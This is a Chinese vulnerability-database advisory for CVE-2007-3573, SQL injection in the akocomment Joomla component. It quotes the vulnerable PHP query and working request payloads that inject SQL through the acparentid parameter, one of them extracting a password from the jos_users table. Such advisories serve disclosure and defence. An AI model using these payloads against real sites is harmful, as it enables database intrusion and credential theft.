akocomment 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189963 漏洞类型 SQL注入
发布时间 2007-07-05 更新时间 2007-07-05
CVE编号 CVE-2007-3573 CNNVD-ID CNNVD-200707-071
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/81656
https://cxsecurity.com/issue/WLB-2007070015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-071
|漏洞详情
akocomment中存在多个SQL注入漏洞。远程攻击者可以借助对一个未明组件的(1)acparentid或(2)acitemid参数,执行任意SQL指令。该漏洞不同于CVE-2006-1421。
|漏洞EXP
$query2 = "INSERT INTO #__akocomment SET parentid='$acparentid',
contentid='$contentid', ip='$ip', name='$acname', title='$title',
comment='$comment', date='$date', published='$ac_autopublish';";

there are two SQL injection.

POC:

<INPUT TYPE='hidden' NAME='acitemid' value='9'><INPUT TYPE='hidden'
NAME='acparentid' value=''><INPUT TYPE='hidden' NAME='contentid'
value='633'>

acparentid=633 e acitemid=9

option=com_akocomment&acitemid=9&acparentid=&contentid=633&func=entry&ac
name=Visitatore&title=aa&comment=af&hid_security_word=db17bc578c383f5bb0
cb9be70c42331c&security_word=dsq

option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c
&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1'
,name='test',title='titolo',comment='commento',date=0,published=1/*

option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c
&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1'
,name=(select
top 1 password from
jos_users),title='titulo',comment='commento',date=0,published=1/*

it work only for magic quotes are off.

alpha fix: enable magic quotes.
|受影响的产品
Akocomment Akocomment 0
|参考资料

来源:BUGTRAQ
名称:20070629akocommentSQLINJECTION(allversion)
链接:http://www.securityfocus.com/archive/1/archive/1/472652/100/0/threaded
来源:OSVDB
名称:38914
链接:http://osvdb.org/38914
来源:SREASON
名称:2860
链接:http://securityreason.com/securityalert/2860